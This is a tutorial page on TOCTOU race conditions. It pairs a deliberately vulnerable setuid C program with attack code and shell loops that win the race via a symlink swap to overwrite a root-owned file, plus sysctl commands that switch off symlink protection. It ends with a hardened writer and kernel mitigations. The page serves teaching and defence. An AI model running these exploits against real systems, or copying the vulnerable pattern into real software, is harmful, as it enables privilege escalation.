
Race condition

CWE - Race Condition (CWE-362; the time-of-check/time-of-use variant shown here is CWE-367)

Time of check to time of use (TOCTOU, also written TOCTTOU)

A TOCTOU bug is a race between a check on a resource and the later use of that resource. In the PoC below the setuid-root program vuln first asks access() whether the invoking user may write ./file, then opens the same path by name. The two calls resolve the path independently, so an attacker who swaps ./file for a symlink in the window between them gets the privileged open() to follow the link and write into a root-owned file that access() would have rejected.

Proof of concept

Create a root-owned target that the unprivileged user cannot write, and an empty user-owned decoy ./file that the attacker will later replace with a symlink:

lazenca0x0@ubuntu:~/Exploit/RaceCondition$ mkdir etc
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ cd etc
lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ echo Only Root! > passwd 
lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ cat passwd 
Only Root!
lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ sudo chown root:root passwd 
lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ sudo chmod 644 passwd 
lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ ls -al passwd 
-rw-r--r-- 1 root root 13 Jun 26 00:46 passwd
lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ cd ..
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ echo > file

vuln.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>

/* Deliberately vulnerable: access() (the check) and open() (the use) each
   resolve ./file by name, and access() tests the real uid while open() runs
   with the effective uid, which is root once the binary is setuid. */
int main(void)
{
    int fd;
    char *file = "./file";
    char buffer[] = "Success!! Race Condition : lazenca.0x0\n";

    if (!access(file, W_OK)) {                 /* check: may the real user write it? */
        printf("Able to open file %s.\n", file);
        fd = open(file, O_WRONLY);             /* use: follows whatever ./file is now */
        if (fd < 0)
            return 1;
        write(fd, buffer, strlen(buffer));     /* sizeof(buffer) would also write the NUL */
        close(fd);
    }
    return 0;
}

attack.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Swap the user-owned decoy for a symlink to the root-owned target. Once the
   symlink is in place access() in vuln fails for the real uid, so the swap has
   to land between vuln's access() and open(); if it misses the window,
   recreate the plain file (echo > file) and run the race again. */
int main(void)
{
    unlink("file");
    symlink("./etc/passwd", "file");
    return 0;
}

run.sh

#!/bin/bash
# Run the setuid vuln in a tight loop so the check/use window keeps recurring.
while :
do
    ./vuln
done

race.sh

#!/bin/bash
# Keep swapping ./file for the symlink until the target's ls -l line (size,
# mtime) changes, i.e. vuln's root open() followed the link and wrote into it.
CHECK_FILE="ls -l ./etc/passwd"
old=$($CHECK_FILE)
new=$($CHECK_FILE)
while [ "$old" == "$new" ]
do
    ./attack
    new=$($CHECK_FILE)
done
echo "Success! The passwd file has been changed"

lazenca0x0@ubuntu:~/Exploit/RaceCondition$ gcc -o vuln vuln.c 
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ sudo chown root:root vuln
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ sudo chmod 4755 ./vuln
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ gcc -o attack attack.c 

Exploit

Turn off the kernel's symlink restriction (see File system hardening below), start run.sh in one terminal so vuln executes continuously, then start race.sh in a second terminal:

lazenca0x0@ubuntu:~/Exploit/RaceCondition$ sudo sysctl -w fs.protected_symlinks=0
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ ./run.sh
Able to open file ./file.
Able to open file ./file.
Able to open file ./file.

...
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ ./race.sh 
Success! The passwd file has been changed
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ cat ./etc/passwd 
Success!! Race Condition : lazenca.0x0
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ 
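
The check/use split in vuln.c and the swap in attack.c, side by side with a hardened writer, as an added example that is not code from the original page. The `between` hook is an assumption made so the swap can be injected deterministically inside the window (the real attack relies on timing); the scratch directory under /tmp, the file names and the sample contents are constructed for the demo. `safe_write()` shows the fix: no access() at all, a single open() with O_NOFOLLOW so a symlink is refused with ELOOP, and fstat() on the descriptor to confirm a plain file owned by the real user was opened, since an fd cannot be redirected by a later rename. Dropping the effective uid with seteuid(getuid()) around the open() is the other standard fix; both avoid deciding on a name that the attacker can rebind.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
/* Constructed sample data: the root-only file's contents and the payload written over it. */
static const char *TARGET_ORIG = "Only Root!\n";
static const char *PAYLOAD     = "Success!! Race Condition\n";
static char last[64];  /* target's contents after each scenario, filled by run() */

/* Attacker hook run inside the window (assumed, to make the race deterministic). */
typedef void (*swap_fn)(const char *path, const char *target);

/* attack.c's move: replace the user-owned decoy with a symlink to the target. */
static void swap_to_symlink(const char *path, const char *target)
{
    unlink(path);
    symlink(target, path);
}

/* Vulnerable pattern from vuln.c: access() check, then open() by name. */
int unsafe_write(const char *path, const char *target, swap_fn between)
{
    if (access(path, W_OK) != 0) return -1;  /* check: may the real uid write it? */
    if (between) between(path, target);      /* the window between check and use  */
    int fd = open(path, O_WRONLY);           /* use: follows whatever path is now  */
    if (fd < 0) return -1;
    ssize_t n = write(fd, PAYLOAD, strlen(PAYLOAD));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Hardened: no access(); one open() that refuses symlinks, then fstat() on the fd
   verifies the inode actually opened, which no later rename can change.
   In a setuid binary getuid() is the invoking user, not root. */
int safe_write(const char *path, const char *target, swap_fn between)
{
    if (between) between(path, target);      /* same swap, before the single open() */
    int fd = open(path, O_WRONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;                   /* ELOOP once path became a symlink */
    struct stat st;                          /* refuse anything but a plain file of the real user */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != getuid()) {
        close(fd); return -1;
    }
    ssize_t n = write(fd, PAYLOAD, strlen(PAYLOAD));
    close(fd);
    return n < 0 ? -1 : 0;
}

static int write_file(const char *path, const char *text)
{
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    int ok = fputs(text, f) >= 0;
    return fclose(f) == 0 && ok ? 0 : -1;
}

/* Build the PoC layout in a scratch dir (<dir>/passwd = target, <dir>/file = decoy),
   run one writer against it, snapshot the target into last, clean up, return the rc. */
static int run(int (*writer)(const char *, const char *, swap_fn), swap_fn sw)
{
    char dir[] = "/tmp/toctou.XXXXXX", target[64], decoy[64];
    if (!mkdtemp(dir)) return -2;
    snprintf(target, sizeof target, "%s/passwd", dir);
    snprintf(decoy, sizeof decoy, "%s/file", dir);
    if (write_file(target, TARGET_ORIG) != 0 || write_file(decoy, "\n") != 0) return -2;
    int rc = writer(decoy, target, sw);
    int fd = open(target, O_RDONLY);
    ssize_t n = fd < 0 ? 0 : read(fd, last, sizeof last - 1);
    if (fd >= 0) close(fd);
    last[n > 0 ? n : 0] = '\0';
    unlink(decoy); unlink(target); rmdir(dir);
    return rc;
}

/* 1 if the swap made unsafe_write() overwrite the root-only target. */
int demo_unsafe(void)
{
    return run(unsafe_write, swap_to_symlink) == 0 && !strcmp(last, PAYLOAD);
}

/* 1 if safe_write() refused the swapped path and left the target intact. */
int demo_safe(void)
{
    return run(safe_write, swap_to_symlink) == -1 && !strcmp(last, TARGET_ORIG);
}

/* 1 if safe_write() still accepts the decoy when nobody swaps it (target untouched). */
int demo_no_race(void)
{
    return run(safe_write, NULL) == 0 && !strcmp(last, TARGET_ORIG);
}

int main(void)
{
    return printf("%d %d %d\n", demo_unsafe(), demo_safe(), demo_no_race()) < 0;
}
```

Build with a plain `gcc -o toctou_demo toctou_demo.c` as an unprivileged user; no setuid bit is needed because the demo only shows which inode each open() ends up on. Each demo function returns 1: the unsafe writer lands in the target after the swap, the hardened writer refuses the symlink and leaves it untouched, and the hardened writer still works on an honest file.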

File system hardening

fs.protected_symlinks (kernel.yama.protected_sticky_symlinks on the Ubuntu 12.04 kernel) makes the kernel refuse to follow a symlink that lives in a world-writable sticky directory such as /tmp unless the follower's uid matches the link's owner or the directory's owner. That stops the classic /tmp symlink race, which is why the PoC turns it off first. Two caveats: the PoC's decoy sits in a directory the attacker owns, so the restriction would not have triggered there anyway, and the setting does not fix the access()/open() pattern itself; the program has to stop checking by name as well.

Disable (as done in the PoC):

Ubuntu 12.04
$ sudo sysctl -w kernel.yama.protected_sticky_symlinks=0
Ubuntu 16.04
$ sudo sysctl -w fs.protected_symlinks=0

Enable (Ubuntu ships it enabled):

Ubuntu 12.04
$ sudo sysctl -w kernel.yama.protected_sticky_symlinks=1
Ubuntu 16.04
$ sudo sysctl -w fs.protected_symlinks=1
